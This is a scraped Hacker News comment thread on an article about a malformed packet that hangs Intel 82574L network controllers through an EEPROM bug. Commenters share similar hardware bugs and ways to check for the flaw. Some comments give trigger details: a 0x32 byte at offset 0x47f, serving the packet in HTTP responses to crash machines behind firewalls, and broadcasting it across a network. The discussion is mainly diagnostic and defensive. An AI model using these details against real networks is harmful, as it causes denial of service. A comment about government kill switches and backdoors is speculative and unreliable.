Packets of Death

734 pointsby quentusrexover 12 years ago

32 comments

guylhemover 12 years ago

That is great HN content!Debugging deep down the rabbit hole, until you find a bug in the NIC EEPROM - and the disbelief many show when hearing a software message can bring down a NIC.I for one would enjoy reading more content like this on HN that what qualifies as best as a friday-night hack

评论 #5178596 未加载

评论 #5179659 未加载

评论 #5179458 未加载

ChuckMcMover 12 years ago

Makes me wonder if this is related to in-band management? One of the interesting thing about working at NetApp, which had its own "OS" was that every driver was written by engineering. That allowed the full challenge of some of these devices to be experienced first hand.One of the more painful summers resulted from a QLogic HBA which sometimes, for no apparent reason, injected a string of hex digits into the data it transmitted. There is a commemorative t-shirt of that bug with just the string of characters. It lead NetApp to putting in-block checksums into the file system so that corruption between the disk and memory, which was 'self inflicted' (and so passed various channel integrity checks) could be detected.Here at Blekko we had a packet fragment that would simply vanish into the center switch. It would go in and never come out. We never got a satisfactory answer for that one. Keith, our chief architect, worked around it by randomizing the packet on a retransmit request.The amount of code between your data and you that you can't control is, sadly, way larger than you probably would like.

jerdfeltover 12 years ago

I ran into a similar problem with an Intel motherboard about 10 years ago.We had problems when some NFS traffic would end up getting stalled. Our NFS server would use UDP packets larger than the MTU and they would end up getting fragmented.Turns out the NIC would not look at the fragmentation headers of the IP packet and always assume a UDP header was present. From time to time, the payload of the NFS packet would have user data that matched the UDP port number the NIC would scan for to determine if the packet should be forwarded to the BMC. This motherboard had no BMC but it was configured as if it did have one.It would time out after a second or so but in the meantime drop a bunch of packets. The NFS server would retransmit the packet but since the payload didn't change, the NIC would reliably drop the rest of the fragments of the packet.Of course Intel claimed it wasn't their bug ("it's a bug in the Linux NFS implementation") but they quickly changed their tune when I coded up a sample program that would send one packet a second and reliably cause the NIC to drop 99% of packets received.While it turned out to be a fairly lame implementation problem on Intel's part (both by ignoring the fragmentation headers and the poor implementation of the motherboard) I have to say it was very satisfying to solve the mystery.

评论 #5178481 未加载

EvanAndersonover 12 years ago

I've always had mixed emotions about NICs that have hardware assisted offload features. I welcome the decrease in CPU utilization and increased throughput, but the NIC ends up being a complex system that very subtle bugs can lurk inside versus being a simple I/O device that a kernel driver controls.If there's denial of service hiding in there I wonder about what other security bugs might be lurking. It's scary stuff, and pretty much impossible to audit yourself.Edit:Also, I'm a little freaked-out that the EEPROM on the NIC can be modified easily with ethtool. I would have hoped for some signature verification. I guess I'm hoping for too much.Edit 2:I wonder if this isn't the same issue described here: <a href="https://bugzilla.redhat.com/show_bug.cgi?id=632650" rel="nofollow">https://bugzilla.redhat.com/show_bug.cgi?id=632650</a>

评论 #5178270 未加载

评论 #5183330 未加载

评论 #5178683 未加载

评论 #5179626 未加载

wglbover 12 years ago

Very good detective work. However, a small suggestion, given:I’ve been working with networks for over 15 years and I’ve never seen anything like this. I doubt I’ll ever see anything like it again.This is a very excellent case for fuzz testing. My thinking is that you want to whip up your Ruby and your EventMachine and Redis going and run a constant fuzz with all sorts of packets in your pre-shipping lab.The idea is that you want to create a condition where you do see it, and the other handful of lockups that are there that you haven't yet seen.

评论 #5178974 未加载

评论 #5178415 未加载

TapaJobover 12 years ago

Fantastic Article, Fantastic fine. Well done.As a telecoms engineer predominantly selling Asterisk for the last 4 years and Asterisk experiance extending back to 2006 it's shocking to see this finally put right. For so many years, I have avoided the e1000 Intel controllers after a very public/embarassing situation when a conferencing server behaved in a wierd manner disrupting core services. Not having the expertise the author has, I narrowed it down to the Eth. Controller, Immediately replaced the server with IBM Hardware with Broadcom chipset and resumed our services in providing conferencing to some of the top FTSE100 companies.Following this episode, I spend numerous days diagnosing the chipset with many conference calls with Digium engineers debugging the server remotely. In the end, no solution, recommendation to avoid the e1000 chipset and moved on.

评论 #5179291 未加载

engtechover 12 years ago

As someone who works with FPGAs/ASICs, this isn't that weird.Everything gets serialized/deserialized these days, so there's all kinds of boundary conditions where you can flip just the right bit and get the data to be deserialized the wrong way.What's more interesting is that it bypasses all of the checks to prevent this from happening.Here is the wiki page on the INVITE OF DEATH which sounds like the problem you hit:<a href="http://en.wikipedia.org/wiki/INVITE_of_Death" rel="nofollow">http://en.wikipedia.org/wiki/INVITE_of_Death</a>

评论 #5178160 未加载

评论 #5178015 未加载

评论 #5179015 未加载

评论 #5178435 未加载

评论 #5178783 未加载

jacquesmover 12 years ago

Persistent bugger."With a modified HTTP server configured to generate the data at byte value (based on headers, host, etc) you could easily configure an HTTP 200 response to contain the packet of death - and kill client machines behind firewalls!"That's worrisome, I'll bet there are lots of not-so-nice guys trying to figure out a way to do just that. There must be tons of server hardware out there with these cards in them.

评论 #5181125 未加载

评论 #5178426 未加载

cheeseprocedureover 12 years ago

I've been unable to reproduce this on systems equipped with the controller in question. I'd love to see "ethtool -e ethX" output for a NIC confirmed to be vulnerable./edit Ah, I spoke to soon; the author has updated his page here with diffs between affected and unaffected EEPROMs:<a href="http://www.kriskinc.com/intel-pod" rel="nofollow">http://www.kriskinc.com/intel-pod</a>

lifeisstillgoodover 12 years ago

Can anyone remember the source of the quote :<pre><code> Sometimes bug fixing simply takes two people to lock themselves in a room and nearly kill themselves for two days. </code></pre> Reminded me of this

0x0over 12 years ago

So is it only the byte at 0x47f that matters? Could you just send a packet filled with 0x32 0x32 0x32 0x32 0x32 to trigger this? (Like, download a file full of 0x32s?) Or does it have to look like a SIP packet?You'd think the odds of getting a packet with 0x32 in position 0x47f is almost 1/256 per packet? So why aren't these network cards falling over everywhere every few seconds?

评论 #5179755 未加载

评论 #5179757 未加载

elasticdogover 12 years ago

Before actually testing this with the real payload, is there a better way of determining if you have a potentially vulnerable driver than something like this?<pre><code> # awk '/eth/ { print $1 }' <(ifconfig -a) | cut -d':' -f1 | uniq | while read interface; do echo -n "$interface "; ethtool -i $interface | grep driver; done eth0 driver: e1000e eth1 driver: e1000e</code></pre>

评论 #5182230 未加载

quentusrexover 12 years ago

Updated with more specific info: <a href="http://www.kriskinc.com/intel-pod" rel="nofollow">http://www.kriskinc.com/intel-pod</a>

druckenover 12 years ago

Intruiging.Intel 82574L ethernet controller looks to be popular too. Intel, Supermicro, Tyan and Asus use it on multiple current motherboards and Asus notably on their WS (Workstation) variants of consumer motherboards, e.g. the Asus P8Z77 WS (socket LGA 1155) and Asus Z9PE-D8 WS (dual CPU, socket LGA 2011).

评论 #5183399 未加载

评论 #5178006 未加载

shawndumasover 12 years ago

<a href="http://computer.yourdictionary.com/truck-roll" rel="nofollow">http://computer.yourdictionary.com/truck-roll</a>

sc68calover 12 years ago

I'm not surprised - firmware for ethernet controllers have grown quite complex, with the addition of new features that allow the hardware to do more work on behalf of the kernel.Could this be a bug in the code of the EEPROM that handles TCP offloading, or one of the other hardware features that are now becoming more common? (<a href="https://en.wikipedia.org/wiki/TCP_offload_engine" rel="nofollow">https://en.wikipedia.org/wiki/TCP_offload_engine</a>)

devicenullover 12 years ago

Wow, I've run into what seems to be the same problem with this controller before. We "fixed" it by upgrading the e1000 driver.

corfordover 12 years ago

My servers all have the affected cards (two per machine - yikes!) but so far I can't reproduce the bug (yay).There are subtle differences between the offsets I get when I run "ethtool -e interface" versus those in the article that indicate an affected card (but they're quite close).Mine are:0x0010: ff ff ff ff 6b 02 69 83 43 10 d3 10 ff ff 58 a50x0030: c9 6c 50 31 3e 07 0b 46 84 2d 40 01 00 f0 06 070x0060: 00 01 00 40 48 13 13 40 ff ff ff ff ff ff ff ffOutput of "ethtool -i interface" (in case anyone wants to compare notes):driver: e1000e version: 1.5.1-k firmware-version: 1.8-0I tested both packet replays by broadcasting to all attached devices on a simple Gbit switch and no links dropped.

评论 #5181082 未加载

gregoover 12 years ago

I had something similar in my home network, but my network foo is not good enough and I did not have to time to debug for days and weeks.Basically one linux box with NVidia embedded gigabit controller could take down the whole segment. It would only happen after a random period, like after days when the box was busy. No two machines connected to the same switch would be able to ping each other any more after that. I suspected the switch, bad cables, etc. In the end I successfully circumvented the problem by buying a discrete gigabit ethernet card for the server in question.

noonespecialover 12 years ago

Kielhofner is a pretty awesome guy. I met him a couple of times "back in the day" at Astricon conferences when he was hacking together Astlinux.He was instrumental in taming the Soekris and Alix SBC boards of old and creating Asterisk appliances with them. If you've got a little asterisk box running on some embedded looking hardware somewhere, it doesn't matter whose name is on the sticker, its got some Kielhofner in it.I live about a mile from Star2Star. I ought to pop in one of these days and see what they're up to.

astanglover 12 years ago

This seems much more serious than the much-ballyhooed Pentium FDIV bug. Hopefully Intel will be on the ball with notifying people and distributing the fix.

lukegoover 12 years ago

Cool!I'm currently working on an open source project where we are chasing "hang really hard and need a reboot to come back" issues with exactly this same ethernet controller, the Intel 82574L. I wonder if it's related!Our Github issue: <a href="https://github.com/SnabbCo/snabbswitch/issues/39" rel="nofollow">https://github.com/SnabbCo/snabbswitch/issues/39</a>

jwsover 12 years ago

Well this hurts. I have a critical machine with a dual NIC Intel motherboard. I had to abandon the 82579LM port because of unresolved bugs in the Linux drivers, and the other one is a 82574L, the one documented in this post.I suppose I can send just the right ICMP echo packet to router to make it send me back an innoculating frame.

评论 #5178511 未加载

altcognitoover 12 years ago

<a href="http://en.wikipedia.org/wiki/Ping_of_death" rel="nofollow">http://en.wikipedia.org/wiki/Ping_of_death</a>

评论 #5178163 未加载

sriramnrnover 12 years ago

Reminds me of my own adventures with systems hanging on PXE boot when a Symantec Ghost PreOS Image didn't boot up completely, and went on to flood the network with packets. See <a href="http://dynamicproxy.livejournal.com/46862.html" rel="nofollow">http://dynamicproxy.livejournal.com/46862.html</a>

spitfireover 12 years ago

This somehow reminds me of the slammer SQL worm. A simply formed single packet caused a tsunami over the internet.Personally, I am not at all surprised that this sort of thing exists. I'm sure there's lots more defects out there to be found. turning completeness is a cruel master.

meshkoover 12 years ago

I have mixed feelings about the write up. I think it gets clear pretty early on that the issue is in the NIC hardware at which point it is time to stop wasting your time investigating problem you can't fix and start contacting the vendor.

评论 #5178502 未加载

评论 #5178513 未加载

评论 #5178736 未加载

viraptorover 12 years ago

It's like a reverse example of a broken packet... You can see a number of interesting samples and stories in the museum of broken packets: <a href="http://lcamtuf.coredump.cx/mobp/" rel="nofollow">http://lcamtuf.coredump.cx/mobp/</a>

X4over 12 years ago

Congrats Sir, you've just discovered the Internet Kill-Switch!The “red telephone,” used to shut down the entire Internet comes to mind.You discovered howto immunize friends and kill enemies in CyberWars.Do governments have an Internet kill switch?Yes, see Egypt & Syria they're good examples. We know China is doing Cyberwars, they are beyond Kill-Switches.Techcrunch: <a href="http://techcrunch.com/2011/03/06/in-search-of-the-internet-kill-switch/" rel="nofollow">http://techcrunch.com/2011/03/06/in-search-of-the-internet-k...</a>Wiki: <a href="http://en.wikipedia.org/wiki/Internet_kill_switch" rel="nofollow">http://en.wikipedia.org/wiki/Internet_kill_switch</a>We know Goverments deploy hardware that they can control when needed. Smartphones are the best examples for Goverment issued backdoors, next to some Intel Hardware (including NICs).

Garbageover 12 years ago

Author mentioned a custom package generator tool "Ostinato". I met the author of this tool 2-3 months back. A lone guy working on this tool as a side project. Amazing work. :)

quentusrexover 12 years ago

It appears to work if you send the packet to the network broadcast address. Quick way to detect if any of the machines are vulnerable(they won't respond to the second ping).

评论 #5179034 未加载

anabisover 12 years ago

Great diligence! I had 1G hubs lockup with Intel 82578DM. I was too lazy track it down, so I just dropped the speed to 100M, which made it work.

32 comments

guylhemover 12 years ago

评论 #5178596 未加载

评论 #5179659 未加载

评论 #5179458 未加载

ChuckMcMover 12 years ago

jerdfeltover 12 years ago

评论 #5178481 未加载

EvanAndersonover 12 years ago

评论 #5178270 未加载

评论 #5183330 未加载

评论 #5178683 未加载

评论 #5179626 未加载

wglbover 12 years ago

评论 #5178974 未加载

评论 #5178415 未加载

TapaJobover 12 years ago

评论 #5179291 未加载

engtechover 12 years ago

评论 #5178160 未加载

评论 #5178015 未加载

评论 #5179015 未加载

评论 #5178435 未加载

评论 #5178783 未加载

jacquesmover 12 years ago

评论 #5181125 未加载

评论 #5178426 未加载

cheeseprocedureover 12 years ago

lifeisstillgoodover 12 years ago

0x0over 12 years ago

评论 #5179755 未加载

评论 #5179757 未加载

elasticdogover 12 years ago

评论 #5182230 未加载

quentusrexover 12 years ago

Updated with more specific info: <a href="http://www.kriskinc.com/intel-pod" rel="nofollow">http://www.kriskinc.com/intel-pod</a>

druckenover 12 years ago

评论 #5183399 未加载

评论 #5178006 未加载

shawndumasover 12 years ago

<a href="http://computer.yourdictionary.com/truck-roll" rel="nofollow">http://computer.yourdictionary.com/truck-roll</a>

sc68calover 12 years ago

devicenullover 12 years ago

Wow, I've run into what seems to be the same problem with this controller before. We "fixed" it by upgrading the e1000 driver.

corfordover 12 years ago

评论 #5181082 未加载

gregoover 12 years ago

noonespecialover 12 years ago

astanglover 12 years ago

This seems much more serious than the much-ballyhooed Pentium FDIV bug. Hopefully Intel will be on the ball with notifying people and distributing the fix.

lukegoover 12 years ago

jwsover 12 years ago

评论 #5178511 未加载

altcognitoover 12 years ago

<a href="http://en.wikipedia.org/wiki/Ping_of_death" rel="nofollow">http://en.wikipedia.org/wiki/Ping_of_death</a>

评论 #5178163 未加载

sriramnrnover 12 years ago

spitfireover 12 years ago

meshkoover 12 years ago

评论 #5178502 未加载

评论 #5178513 未加载

评论 #5178736 未加载

viraptorover 12 years ago

X4over 12 years ago

Garbageover 12 years ago

Author mentioned a custom package generator tool "Ostinato". I met the author of this tool 2-3 months back. A lone guy working on this tool as a side project. Amazing work. :)

quentusrexover 12 years ago

It appears to work if you send the packet to the network broadcast address. Quick way to detect if any of the machines are vulnerable(they won't respond to the second ping).

评论 #5179034 未加载

anabisover 12 years ago

Great diligence! I had 1G hubs lockup with Intel 82578DM. I was too lazy track it down, so I just dropped the speed to 100M, which made it work.